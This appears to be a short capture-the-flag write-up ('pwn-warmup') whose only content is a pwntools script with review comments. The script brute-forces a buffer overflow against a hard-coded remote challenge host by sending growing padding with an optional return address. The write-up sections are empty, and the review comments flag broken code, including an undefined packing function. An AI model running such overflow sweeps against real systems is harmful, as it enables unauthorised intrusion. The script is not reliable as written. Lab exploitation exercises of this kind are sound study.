
pwn-warmup


1.题目

1.1.保护机制

不详

1.2.关键代码

2.思路

from pwn import *
from ctypes import *

# Address that fuzz() appends after the padding when flag is 1 or 2.
# NOTE(review): the page does not say what is located at this address;
# confirm against the challenge binary.
addr = 0x40060d

# Disabled debug context, kept from the original.
# NOTE(review): "amd" is not a pwntools architecture name; "amd64" was
# presumably intended. Verify before re-enabling.
#context(arch="amd",os="linux",log_level="debug")

# Module-level connection to the hard-coded remote host. The sweep loop
# further down rebinds `con` for every attempt, so this first connection
# is not the one the payloads are sent over.
con = remote('111.200.241.244',59105)
# Local-binary alternatives the author left disabled:
#con = process('./pwn')
#elf = ELF('./pwn')

def fuzz(con,num,flag):
    """Send one probe line after the ">" prompt on connection `con`.

    The line is `num` copies of "a", optionally followed by the module-level
    `addr` in packed form:

      flag == 1  -> padding + p32(addr)
      flag == 2  -> padding + p(addr)
      otherwise  -> padding only

    Returns None; the only effect is the write performed by
    con.sendlineafter().
    """
    padding = "a" * num
    if flag == 1:
        tail = p32(addr)
    elif flag == 2:
        # NOTE(review): `p` is not defined anywhere in the visible source.
        # Unless one of the wildcard imports provides it, this branch raises
        # NameError before anything is sent, and a caller that swallows
        # exceptions will hide that. Confirm which packer was intended.
        tail = p(addr)
    else:
        tail = ""
    con.sendlineafter(">", padding + tail)

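# Sweep padding lengths 0..999. For each length, try the three payload
# variants fuzz() distinguishes (flag 0, 1, 2), each over a fresh connection,
# and print whatever the service sends back.
#
# Changes from the original loop:
#   * every connection is closed in `finally`; previously a successful
#     attempt never closed its socket, leaking up to 3000 connections;
#   * `except Exception` replaces the bare `except:`, so Ctrl-C/SystemExit
#     still stop the sweep, and the error is printed instead of being
#     discarded (a silent skip made coding errors look like "no response");
#   * `con` is reset per attempt, so a failed remote() no longer causes the
#     previous attempt's connection to be closed in its place.
# print(...) with a single argument behaves the same as the original
# Python 2 print statements.
for i in range(1000):
    print(i)
    for j in range(3):
        con = None
        try:
            con = remote('111.200.241.244',59105)
            fuzz(con,i,j)
            text = con.recv()
            print("texct.len = " + str(len(text)) + "text = " + text)
            print("num = " + str(i) + "flag = " + str(j))
        except Exception as err:
            # Report which attempt failed and why, then continue with the
            # next variant.
            print("num = " + str(i) + "flag = " + str(j) + " failed: " + repr(err))
        finally:
            # Release the socket whether or not the attempt succeeded.
            if con is not None:
                con.close()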

        
